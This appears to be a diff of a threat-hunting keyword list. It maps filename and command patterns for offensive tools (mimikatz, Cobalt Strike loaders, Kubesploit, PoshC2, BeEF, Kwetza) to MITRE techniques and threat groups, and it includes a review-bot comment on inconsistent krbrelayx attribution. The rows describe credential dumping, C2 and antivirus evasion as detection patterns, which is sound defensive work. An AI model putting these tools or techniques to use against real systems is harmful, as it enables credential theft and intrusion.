Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" 
"*KRBUACBypass.csproj*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" 
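Review bot: The `*krbrelayx*` row on the new side carries `metadata_tool` `impacket` and the Impacket description, but its `metadata_link` is `https://github.com/dirkjanm/krbrelayx`, and the sibling rows `*krbrelayx.git*`, `*krbrelayx.py*` and `*krbrelayx-master*` in this hunk use tool `krbrelayx`. The bare wildcard also matches everything those three rows match, so a single event will hit rows that disagree on tool name, severity (`10` vs `N/A`) and proxy-detection flag (`0` vs `1`), which complicates triage and deduplication. I would set the tool column of the `*krbrelayx*` row to `krbrelayx`, or point its link at the Impacket project if that attribution is intended. I would also give the three sibling rows the same severity score instead of `N/A`.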
@@ -12864,18 +13020,18 @@ "*kubesploit-main*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kwetza*","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. 
Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","604","256","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z" -"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*kyleavery/inject-assembly*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*L0phtCrack*","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - 
T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Ladon * AllScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Ladon * CiscoScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Ladon * OnlineIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" 
@@ -12971,26 +13127,27 @@ "*Ladon-N40.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*LadonStudy.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Lalin.sh *","offensive_tool_keyword","LALIN","this script automatically 
install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" -"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*lanjelot*","offensive_tool_keyword","Github Username","github username. 
creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LANs.py*","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2533","518","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" -"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 